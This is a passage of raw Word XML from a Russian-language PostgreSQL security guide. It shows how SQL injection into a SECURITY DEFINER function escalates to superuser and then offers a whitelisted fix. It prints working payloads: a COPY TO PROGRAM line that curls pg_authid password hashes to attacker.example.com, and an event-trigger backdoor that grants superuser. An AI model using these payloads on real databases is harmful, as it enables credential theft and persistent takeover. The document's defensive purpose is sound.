      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXECUTE парсит multi-statement: ANALYZE, DROP USER, CREATE USER. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все исполняются под `postgres` (superuser)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. После — атакующий имеет полноценную superuser-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для прямого login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB9932" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — RCE через COPY TO PROGRAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060FD1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB153A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"tenant": "tenant_42", "table": "users; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM 'curl -X POST http://attacker.example.com/exfil --data @-'; --"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA4E26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE tenant_42.users; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A250036" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM 'curl -X POST http://attacker.example.com/exfil --data @-'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788613D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (superuser → имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t>) — COPY TO PROGRAM запускает shell, exfiltrate all roles' passwords. Полный 3.7.1 chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB44BF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — backdoor через CREATE EVENT TRIGGER (PG 17 ON LOGIN):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D31E5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /admin/refresh-stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40DB9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"tenant": "tenant_42", "table": "users; CREATE OR REPLACE FUNCTION admin.bd() RETURNS event_trigger LANGUAGE plpgsql AS $f$ BEGIN EXECUTE 'GRANT SUPERUSER ON ROLE attacker'; END $f$; CREATE EVENT TRIGGER bd ON ddl_command_end EXECUTE FUNCTION admin.bd(); --"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235B2E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Persistent backdoor через event trigger — каждое следующее DDL-событие будет добавлять attacker в superuser. Для PG 17 — ON LOGIN trigger ещё мощнее (срабатывает на каждом login). Из-за superuser-context creation triggers — устанавливаются успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C7653" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Variant B полный SQL trace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF4090C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BE25C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7AFED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'tenant_42',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24DC08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'users; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM ''curl ...''; --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419FCF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040981D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ caller — application_admin (НЕ superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC607B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722DAAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- В plpgsql функции — context переключается на postgres (SECURITY DEFINER):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C584C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'ANALYZE tenant_42.users; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334424AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         TO PROGRAM ''curl ...''; --';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F6B6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ EXECUTE парсит multi-statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408C3A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ Все statements исполняются под postgres (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46F16E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ COPY TO PROGRAM → RCE как ОС-пользователь postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8C3EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Защита — fixed function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871596E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F808DE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_schema text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFBE11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    target_table text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB5708" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5306CB56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B37EA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0DBEE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D618AA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp    -- защита 3.13.6 (без unqualified hijack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210B6FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76488955" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C96D06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_schemas text[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656875CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737BB4D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 1. Whitelist tenant_schema через query к metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4F8D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT array_agg(nspname) INTO allowed_schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A2EA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBEC6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE nspname LIKE 'tenant_%' AND nspname ~ '^tenant_[0-9]+$';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69B078" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3BF24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tenant_schema &lt;&gt; ALL(allowed_schemas) THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE88FDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'invalid tenant_schema: %', tenant_schema;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3C536" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68117DBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02117C54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 2. Whitelist target_table — ASCII-only identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB4C9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF target_table !~ '^[a-z_][a-z0-9_]*$' THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17731D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'invalid table identifier: %', target_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7F9FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DA884" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
